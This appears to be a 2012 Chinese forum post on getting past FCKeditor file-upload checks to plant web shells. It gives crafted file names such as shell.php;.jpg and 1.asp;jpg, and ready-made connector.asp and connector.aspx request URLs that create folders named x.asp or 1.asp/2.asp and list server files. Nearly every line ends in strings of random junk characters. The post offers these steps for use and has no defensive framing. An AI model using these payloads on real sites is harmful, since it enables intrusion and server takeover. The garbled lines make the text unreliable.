很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg$ L ]6 S9 [, u, }
+ x M* m4 m, e+ @
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。2 E/ Q m, F8 ^ H4 c$ |* E
4 U1 F C! V5 ^. }/ V3 j
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。7 o6 }* a* i. v/ [9 b! J& Q
' ]- a: ]+ \' n
突破建立文件夹:9 C2 E8 f! e& P5 J; Y" N
) C+ b/ R7 o8 [: C/ C8 R
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp% J+ I. R8 N5 v1 K
0 f. [* @, ?9 d* _6 q1 q4 k
参数:
) h8 u x9 \( j: i. c5 J& E" R7 V- a' K3 R, K+ N
当前目录名:CurrentFolder=/qing.asp
* e9 h6 T/ H* V! k2 Y/ b# S% {# f9 [$ Y+ [* ]% |7 ~
新的目录名:NewFolderName=x.asp4 D1 Y3 Z& s* }
8 [' J& r# [; f4 v' J+ V6 k
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
. U! q5 P+ T+ W: L0 P" h0 l+ G6 \1 u4 r* D2 \# n6 A; S2 P
那么 x.asp 就已经建立生成了,此方法百试百灵!- ~7 {9 r% ^% F( A
H, C7 \9 z' v; x1 e! m Q
新建文件夹参数 x.asp,基本都能搞定。
: P* t$ W1 N- p, a
, X$ [ X. _* y6 W0 u1 ^- v下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
6 M! @5 F$ q! a" Z- U) n* T3 }- `) m7 c
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
; n' \* |2 Z1 X; M5 D1 `& d3 D0 d5 `4 K! C1 ^0 T" b) {
获取文件列表4 J* M+ L) M& |5 \4 \
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
+ R- b6 k9 \" U* U6 u# H
1 V6 \3 Z4 W r8 b) O" B |
发表于 2012-12-31 09:27:09
收藏
支持
反对